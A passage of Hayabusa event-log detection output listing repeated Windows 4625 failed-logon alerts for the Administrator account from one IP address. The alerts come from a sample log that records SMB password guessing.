Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.757 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.849 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:52.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.074 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.321 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.702 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.806 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.862 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.919 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:53.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.066 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.112 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.210 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.249 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.342 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.440 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.633 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.729 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.865 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.914 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:54.963 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.013 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.078 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.358 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.413 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.530 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.574 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.887 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:55.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.043 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.097 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.298 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.342 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.530 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 